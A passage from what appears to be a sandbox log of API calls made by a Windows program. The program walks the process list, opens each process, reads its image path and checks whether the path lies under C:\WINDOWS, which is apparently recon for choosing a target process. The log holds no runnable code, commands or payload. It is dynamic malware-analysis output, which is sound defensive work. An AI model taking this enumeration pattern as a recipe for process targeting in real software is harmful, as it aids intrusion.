cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.747] GetCurrentProcessId () returned 0xf00 [0134.747] GetCurrentProcess () returned 0xffffffff [0134.747] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.747] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0134.747] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.748] GetCurrentProcessId () returned 0xf00 [0134.748] GetCurrentProcess () returned 0xffffffff [0134.748] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.748] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0134.748] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.748] GetCurrentProcessId () returned 0xf00 [0134.748] GetCurrentProcess () returned 0xffffffff [0134.748] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.748] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0134.748] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.749] GetCurrentProcessId () returned 0xf00 [0134.749] GetCurrentProcess () returned 0xffffffff [0134.749] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.749] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0134.749] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.750] GetCurrentProcessId () returned 0xf00 [0134.750] GetCurrentProcess () returned 0xffffffff [0134.750] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.750] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0134.750] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.750] GetCurrentProcessId () returned 0xf00 [0134.750] GetCurrentProcess () returned 0xffffffff [0134.750] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.750] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0134.750] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.751] GetCurrentProcessId () returned 0xf00 [0134.751] GetCurrentProcess () returned 0xffffffff [0134.751] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.751] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0134.751] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.751] GetCurrentProcessId () returned 0xf00 [0134.751] GetCurrentProcess () returned 0xffffffff [0134.751] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.751] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0134.752] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.752] GetCurrentProcessId () returned 0xf00 [0134.752] GetCurrentProcess () returned 0xffffffff [0134.752] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.752] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0134.752] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.753] GetCurrentProcessId () returned 0xf00 [0134.753] GetCurrentProcess () returned 0xffffffff [0134.753] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.753] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0134.753] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.753] GetCurrentProcessId () returned 0xf00 [0134.753] GetCurrentProcess () returned 0xffffffff [0134.753] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.753] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0134.753] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.761] GetCurrentProcessId () returned 0xf00 [0134.761] GetCurrentProcess () returned 0xffffffff [0134.761] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.761] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0134.762] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.762] GetCurrentProcessId () returned 0xf00 [0134.762] GetCurrentProcess () returned 0xffffffff [0134.762] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.762] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0134.762] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.763] GetCurrentProcessId () returned 0xf00 [0134.763] GetCurrentProcess () returned 0xffffffff [0134.763] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.763] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0134.763] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.763] GetCurrentProcessId () returned 0xf00 [0134.763] GetCurrentProcess () returned 0xffffffff [0134.763] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.763] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0134.763] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0134.764] GetCurrentProcessId () returned 0xf00 [0134.764] GetCurrentProcess () returned 0xffffffff [0134.764] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.764] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x960 [0134.764] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0134.764] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0134.764] CloseHandle (hObject=0x960) returned 1 [0134.764] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.765] GetCurrentProcessId () returned 0xf00 [0134.765] GetCurrentProcess () returned 0xffffffff [0134.765] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.765] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x960 [0134.765] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0134.765] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0134.765] CloseHandle (hObject=0x960) returned 1 [0134.765] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0134.766] GetCurrentProcessId () returned 0xf00 [0134.766] GetCurrentProcess () returned 0xffffffff [0134.766] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.766] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x960 [0134.766] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0134.766] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0134.766] CloseHandle (hObject=0x960) returned 1 [0134.766] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.775] GetCurrentProcessId () returned 0xf00 [0134.775] GetCurrentProcess () returned 0xffffffff [0134.775] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.775] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0134.794] GetCurrentProcessId () returned 0xf00 [0134.794] GetCurrentProcess () returned 0xffffffff [0134.794] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.803] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0134.803] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0134.803] GetCurrentProcessId () returned 0xf00 [0134.804] GetCurrentProcess () returned 0xffffffff [0134.804] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.804] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0134.804] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0134.804] GetCurrentProcessId () returned 0xf00 [0134.804] GetCurrentProcess () returned 0xffffffff [0134.804] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.804] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0134.804] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0134.805] GetCurrentProcessId () returned 0xf00 [0134.805] GetCurrentProcess () returned 0xffffffff [0134.805] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.805] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x960 [0134.805] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0134.805] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0134.805] CloseHandle (hObject=0x960) returned 1 [0134.805] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0134.806] GetCurrentProcessId () returned 0xf00 [0134.806] GetCurrentProcess () returned 0xffffffff [0134.806] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.806] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x960 [0134.806] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0134.806] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0134.806] CloseHandle (hObject=0x960) returned 1 [0134.806] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0134.806] GetCurrentProcessId () returned 0xf00 [0134.806] GetCurrentProcess () returned 0xffffffff [0134.807] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0134.807] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x960 [0134.807] GetModuleFileNameExW (in: hProcess=0x960, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0134.807] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0134.807] CloseHandle (hObject=0x960) returned 1 [0137.729] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0137.746] GetCurrentProcessId () returned 0xf00 [0137.746] GetCurrentProcess () returned 0xffffffff [0137.746] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.746] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0137.746] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0137.753] GetCurrentProcessId () returned 0xf00 [0137.753] GetCurrentProcess () returned 0xffffffff [0137.753] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.757] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0137.759] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.764] GetCurrentProcessId () returned 0xf00 [0137.764] GetCurrentProcess () returned 0xffffffff [0137.767] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.771] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0137.772] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0137.778] GetCurrentProcessId () returned 0xf00 [0137.779] GetCurrentProcess () returned 0xffffffff [0137.782] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.786] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x86c [0137.786] GetModuleFileNameExW (in: hProcess=0x86c, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0137.787] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0137.787] CloseHandle (hObject=0x86c) returned 1 [0137.787] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0137.797] GetCurrentProcessId () returned 0xf00 [0137.797] GetCurrentProcess () returned 0xffffffff [0137.797] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.798] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0137.804] Process32NextW (in: hSnapshot=0x880, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0137.813] GetCurrentProcessId () returned 0xf00 [0137.819] GetCurrentProcess () returned 0xffffffff [0137.819] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0137.820] OpenProcess 